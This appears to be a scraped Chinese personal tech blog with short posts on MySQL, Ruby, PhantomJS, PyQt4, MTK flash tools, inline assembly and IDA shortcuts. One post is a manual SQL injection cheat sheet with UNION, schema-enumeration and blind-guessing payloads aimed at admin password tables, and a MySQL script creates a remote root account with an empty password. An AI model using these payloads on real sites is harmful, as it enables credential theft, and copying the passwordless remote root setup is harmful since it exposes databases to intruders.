MySQL user表初始化

12月 31 2016 编程 5 分钟读完 (约 685 字)

默认安装的MySQL数据库，无法远程连接。
登录MySQL之后，运行

1	SELECT user,host from mysql.user;

如果只有一条记录，说明是这个原因。
将下面的脚本保存成user.sql，登录MySQL，运行：

1
2
3

use mysql;
source user.sql;
flush privileges;

Notice: 会重置MySQL user表，并且将root用户密码设置为空。

脚本内容：点这里直接下载

SET FOREIGN_KEY_CHECKS=0;

-- ----------------------------
-- Table structure for `user`
-- ----------------------------
USE mysql;
DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (
  `Host` char(60) COLLATE utf8_bin NOT NULL DEFAULT '',
  `User` char(16) COLLATE utf8_bin NOT NULL DEFAULT '',
  `Password` char(41) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '',
  `Select_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Insert_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Update_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Delete_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Create_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Drop_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Reload_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Shutdown_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Process_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `File_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Grant_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `References_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Index_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Alter_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Show_db_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Super_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Create_tmp_table_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Lock_tables_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Execute_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Repl_slave_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Repl_client_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Create_view_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Show_view_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Create_routine_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Alter_routine_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Create_user_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Event_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `Trigger_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
  `ssl_type` enum('','ANY','X509','SPECIFIED') CHARACTER SET utf8 NOT NULL DEFAULT '',
  `ssl_cipher` blob NOT NULL,
  `x509_issuer` blob NOT NULL,
  `x509_subject` blob NOT NULL,
  `max_questions` int(11) unsigned NOT NULL DEFAULT '0',
  `max_updates` int(11) unsigned NOT NULL DEFAULT '0',
  `max_connections` int(11) unsigned NOT NULL DEFAULT '0',
  `max_user_connections` int(11) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`Host`,`User`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Users and global privileges';

-- ----------------------------
-- Records of user
-- ----------------------------
INSERT INTO `user` VALUES ('localhost', 'root', '', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', '', '', '', '', '0', '0', '0', '0');
INSERT INTO `user` VALUES ('127.0.0.1', 'root', '', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', '', '', '', '', '0', '0', '0', '0');
INSERT INTO `user` VALUES ('%', 'root', '', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', '', '', '', '', '0', '0', '0', '0');
flush privileges;

Notepad++设置运行快捷键

12月 31 2016 编程几秒读完 (约 86 字)

Python
先按F5，之后将下面的命令保存，再设置快捷键。

1	cmd /k c:\python27\python "$(FULL_CURRENT_PATH)" & PAUSE & EXIT

我使用的是Ctrl+F9
之后按Ctrl+s保存更改，再按Ctrl+F7即可快速在cmd中运行代码，方便调试。

Ruby

1	cmd /k C:\Ruby22-x64\bin\ruby "$(FULL_CURRENT_PATH)" & PAUSE & EXIT

Phantomjs 请求与响应

12月 31 2016 编程几秒读完 (约 88 字)

使用Phantomjs访问网页并截图

var page = require('webpage').create();

page.onResourceRequested = function(request) {
  console.log('Request ' + JSON.stringify(request, undefined, 4));
    console.log( '---------------------------------------------------------------------' );
};
page.onResourceReceived = function(response) {
  console.log('Receive ' + JSON.stringify(response, undefined, 4));
  console.log( '---------------------------------------------------------------------' );
};

page.open('https://www.baidu.com', function(status) {
      console.log("Status: " + status);
      if(status === "success") {
              page.render('example.png');
            }
      phantom.exit();
});

example.png

Phantomjs已经接近废弃，如今推荐使用google的headless技术。

PyQt4解析HTML Dom

12月 31 2016 编程 1 分钟读完 (约 116 字)

环境:
Windows 10
Python 2.7.10

0x01 安装PyQt4
在这个页面下载，注意选对版本。
https://riverbankcomputing.com/software/pyqt/download
我选择的版本是 PyQt4-4.11.4-gpl-Py2.7-Qt4.8.7-x64.exe

0x02 编写测试脚本

import sys
from PyQt4 import QtGui

app = QtGui.QApplication(sys.argv)
widget = QtGui.QWidget()
widget.resize(250, 150)
widget.setWindowTitle('PyQt')
widget.show()
sys.exit(app.exec_())

如果成功运行并弹出一个空白的窗口，说明PyQt4已经安装上了。

0x03 使用PyQt4的QtWebKit实现解析Dom

待续。

Ruby笔记

12月 31 2016 编程 7 分钟读完 (约 1017 字)

1.数组遍历方法总结

1	array = (1..10).to_a

length = array.length 
length.times do t 
print "#{array[t]} " 
end 
puts "n"

length = array.length-1 
for i in 0..length do 
print "#{array[i]} " 
end 
puts "n"

for i in array do 
    print "#{i} " 
end 
puts "n"

1 2	array.each{x print x," "} puts "n"

length = array.length 
i = 0 
while i< length do 
print "#{array[i]} " 
i = i+1 
end 
puts "n"

length = array.length 
i = 0 
until i==length do 
print "#{array[i]} " 
i += 1 
end 
puts "n"

1 2	array.each_index do i print "#{array[i]} "

2.Ruby连接数据库

mysql

require 'mysql'  
begin  
    db = Mysql.init  
    db.options(Mysql::SET_CHARSET_NAME, 'utf8')  
    db = Mysql.real_connect("127.0.0.1", "root", "123456", "test", 3306)  
    db.query("SET NAMES utf8")
    db.query("drop table if exists tb_test")  
    db.query("create table tb_test (id int,
    text LONGTEXT) ENGINE=MyISAM DEFAULT CHARSET=utf8")  
    db.query("insert into tb_test (id, text) values ( 
    1,'first line'),(2,'second line')")  
    printf "%d rows were inserted\n",db.affected_rows  
    rslt = db.query("select text from tb_test")  
    while row = rslt.fetch_row do  
        puts row[0]  
    end  
rescue Mysql::Error => e  
        puts "Error code: #{e.errno}"  
        puts "Error message: #{e.error}"  
        puts "Error SQLSTATE: #{e.sqlstate}" if e.respond_to?("sqlstate")  
ensure  
        db.close if db  
end

redis

#!/bin/ruby

require 'redis'

def writeToFile(file,content)
    fp = File.new(file,"a+") 
    if fp
        fp.syswrite(content)
    else
        puts "..."
    end
end

def connect(host)
    redis = Redis.new(:host => host,:port => 6379)
    redis.info.keys.each do |key|
        puts "#{key}:\t"+redis.info["#{key}"]
    end
end

connect("1.1.1.1")

sqlite3

require 'sqlite3'

db = SQLite3::Database.new('test.db')

db.execute("create table test(
                ID integet not null,
                Username varchar(20) null,
                Password varchar(64) null)")
db.execute("insert into test(ID.Username,Password) 
    values('0','admin','admin')")
db.execute("select * from test")
db.execute("update test set password='12345' where id=0")

3.Ruby socket

服务端：

require 'socket'

server = TCPServer.open('0.0.0.0', 8080)
loop do
    Thread.start(server.accept) do |client|
        begin
            while true
                puts "#{client.to_i} online"
                data = client.read()
                throw "empty" if data.empty?
                #puts data.length
                puts data
            end
        rescue Exception => e
            puts "#{client.to_i} offline"
        end
    end
end

客户端：

require 'socket'

hostname = '127.0.0.1'
port = 8080
buf = 'test'
s = TCPSocket.open(hostname, port)
s.write buf
sleep(1)
s.close

4.ruby gem 文档服务

rubygems.org上的gem文档访问起来太慢了，其实gem本身就自带doc的功能
安装gem的时候会默认安装相应gem的doc，如果不想占用空间安装doc，则gem install XXX –no-doc 即可。
使用下列命令可以启动gem自带的文档：

1	gem server --port 1234

然后访问 http://localhost:1234 就可以查看相关的gem文档。

5.ruby改变控制台输出内容的颜色

puts "\033[1m前景色\033[0m\n"  
puts "   \033[30mBlack (30)\033[0m\n"  
puts "   \033[31mRed (31)\033[0m\n"  
puts "   \033[32mGreen (32)\033[0m\n"  
puts "   \033[33mYellow (33)\033[0m\n"  
puts "   \033[34mBlue (34)\033[0m\n"  
puts "   \033[35mMagenta (35)\033[0m\n"  
puts "   \033[36mCyan (36)\033[0m\n"  
puts "   \033[37mWhite (37)\033[0m\n"  
puts ''   
puts "\033[1m背景色\033[0m\n"  
puts "   \033[40m\033[37mBlack (40), White Text\033[0m\n"  
puts "   \033[41mRed (41)\033[0m\n"  
puts "   \033[42mGreen (42)\033[0m\n"  
puts "   \033[43mYellow (43)\033[0m\n"  
puts "   \033[44mBlue (44)\033[0m\n"  
puts "   \033[45mMagenta (45)\033[0m\n"  
puts "   \033[46mCyan (46)\033[0m\n"  
puts "   \033[47mWhite (47)\033[0m\n"  
puts ''  
puts "\033[1m其他\033[0m\n"  
puts "   Reset (0)"  
puts "   \033[1mBold (1)\033[0m\n"  
puts "   \033[4mUnderlined (4)\033[0m\n"

colors

6.一些比较特别的包

Ruby json gem
https://rubygems.global.ssl.fastly.net/gems/json-1.8.3.gem
树莓派wiringpi gpio包
http://pi.gadgetoid.com/article/wiringpi-as-a-ruby-gem

7.安装rvm的正确姿势

参考自:http://rvm.io/rvm/install
首先添加gpg公钥:

1	gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3

安装稳定版本的rvm

1	curl -sSL https://get.rvm.io \| bash -s stable --ruby

8.解决kali2.0中RVM不能编译ruby-2.3.3

错误详情：

ruby-2.3.3 - #compiling.......................................................................-
Error running '__rvm_make -j4',
showing last 15 lines of /usr/local/rvm/log/1488041042_ruby-2.3.3/make.log
exts.mk:210: recipe for target 'ext/openssl/all' failed
make[1]: *** [ext/openssl/all] Error 2
make[1]: *** Waiting for unfinished jobs....
installing default nkf libraries
compiling objspace_dump.c
linking shared-object json/ext/generator.so
make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/json/generator'
linking shared-object objspace.so
make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/objspace'
linking shared-object nkf.so
make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/nkf'
make[1]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3'
uncommon.mk:203: recipe for target 'build-ext' failed
make: *** [build-ext] Error 2
++ return 2
There has been an error while running make. Halting the installation.

查看/usr/local/rvm/log/1488041042_ruby-2.3.3/make.log发现是openssl版本过老导致的。

解决：
第一步：先安装用于rvm的openssl：
1
rvm pkg install openssl

第二步：编译安装ruby，指定openssl目录（我的是/usr/local/rvm/usr/）

1	rvm install ruby-2.3.3 --with-openssl-dir=/usr/local/rvm/usr/

9.设置Gems默认源为ruby-china

现在没有淘宝源了，只有ruby-china源

1	gem sources --add https://gems.ruby-china.org/ --remove https://rubygems.org/

设置Bundler默认源为ruby-china：

1	bundle config mirror.https://rubygems.org https://gems.ruby-china.org

这样修改以后，即使Gemfile中指定了Source，也会用国内的源。

SP Flash Tool版本对应MTK处理器型号(SP Flash Tool Versions)

12月 31 2016 编程 6 分钟读完 (约 869 字)

SPFlashTool version for different MTK processor

SP_Flash_Tool-v3.1224.0.100
MT6516,MT6573,MT6573,MT6575,MT6575,MT6577

SP_Flash_Tool-v3.1332.0.187
MT6516,MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6582,MT8135

SP_Flash_Tool-v3.1344.0.212
MT6516,MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6582,MT8135,MT6592,MT6571

SP_Flash_Tool-v5.1352.01
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT6592

SP-Flash-Tool-v5.1436.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752

SP-Flash-Tool-v5.1528.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP-Flash-Tool-v5.1532.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570,MT6755

SP_Flash_Tool_5.1343
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT6592

SP_Flash_Tool_5.1504
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753

SP_Flash_Tool_5.1520
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_5.1524.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_v5.1452
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753

SP_Flash_Tool_v5.1512
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_v5.1516
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_v5.1548
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570,MT6755,MT6797

SP_Flash_Tool_v5.1552
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6797

SP_Flash_Tool_v5.1604
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797

SP_Flash_Tool_v5.1612
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757

SP_Flash_Tool_v5.1616_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6798,MT0507

SP_Flash_Tool_v5.1620_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6798,MT0507,MT8160,MT0633

SP_Flash_Tool_v5.1624_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6798,MT0507,MT8167,MT0633

SP_Flash_Tool_v5.1628_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6799,MT0507,MT8167,MT0633

SP_Flash_Tool_v5.1632_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6799,MT0507,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1636_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6799,MT6798,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1640_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,MT6757D,ELBRUS,MT6799,MT6798,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1644_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,MT6757D,ELBRUS,MT6799,MT6798,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1648_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,MT6757D,ELBRUS,MT6799,MT6759,MT8167,MT8516,MT6570,MT6763

SQL手工注入技巧

12月 31 2016 安全技术 3 分钟读完 (约 428 字)

MYSQL篇
1.内置函数和变量

1	@@datadir,version(),database(),user(),load_file(),outfile()

2.利用concat(),group_concat(),concat_ws()拼接查询结果
实例：

1 2	xxx.php?id=1 and 1=2 union select 1, group_concat(username,0x3a,password),3 from user

3.使用内建数据库查询表段和字段
查表段：

1
2
3

xxx.php?id=1 and 1=2 union select 1,2,table_name from 
(select * from information_schema.tables where table_schema=数据库名的hex 
order by table_schema limit 0,1)t limit 1–

查字段：

1
2
3

xxx.php?id=1 and 1=2 union select 1,2,column_name from 
(select * from information_schema.columns where table_name=表名的hex 
and table_schema=数据库名hex值 order by 1 limit 1,1)t limit 1–

这里可以再结合下concat的拼接功能

xxx.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20) 
from (select * from information_schema.columns where table_name=表名的hex 
and table_schema=数据库名hex值 order by 1 limit 0,n)t limit 1– 
[n表示第n条数据]

Access篇

猜表名

1	.asp?id=1 and exists (select from admin)

猜列名

1	*.asp?id=1 and exists (select password from admin)

Order by查询

1	*.asp?id=1 order by 3

union 查询

1	*.asp?id=1 union select 1,password,3 from admin

不支持union的情况
先判断内容的长度

1	*.asp?id=132 and (select top 1 len(user) from admin) >5

然后一个一个猜

1	*.asp?id=132 and (select top 1 asc(mid(user,1,1)) from admin)>97

例如确定asc(mid(user,1,1))的值是97，即可判断出user的第一个字符为a
确定了之后继续从第二个位置猜

1	*.asp?id=132 and (select top 1 asc(mid(user,2,1)) from admin)>97

以此类推

MSSQL篇
基于报错的MSSQL注入：
判断是否是MSSQL

1	'and exists (select * from sysobjects) --

如果返回正常，就说明是MSSQL，否则当sysobjects不存在，是会报错的。

猜表名：

1	'and exists(select * from admin)--

如果存在，会返回正常页面，否则报错，就是不存在。

VC内联汇编和GCC内联汇编的语法区别

12月 31 2016 编程几秒读完 (约 52 字)

VC

#include <stdio.h>

main(){
    int a = 1;
    int b = 2;
    int c;
    __asm{
        mov eax,a
        mov ebx,b
        mov ecx,1h
        add eax,ebx
        mov c,ecx
    }
    printf("%x\n", c);
}

GCC

#include <stdio.h>

main(){
    int a = 1;
    int b = 2;
    int c;
    asm(
        "add %2,%0"        //1
        :"=g"(c)           //2
        :"0"(a),"g"(b)     //3
        :"memory"          //4
    );
        printf("%x\n", c);
}

IDA快捷键

12月 31 2016 安全技术几秒读完 (约 79 字)

快捷键	作用
Alt+T	搜索文本
Ctrl+1	Quick View导航
空格键	图形视图/汇编视图切换
Shift+F3	切换到Functions窗口
Shift+F4	切换到Names窗口
Shift+F7	切换到Segments窗口
Shift+F12	切换到Strings窗口
IDA View内
Ctrl+Enter	前进(函数调用)
Esc	后退(函数调用)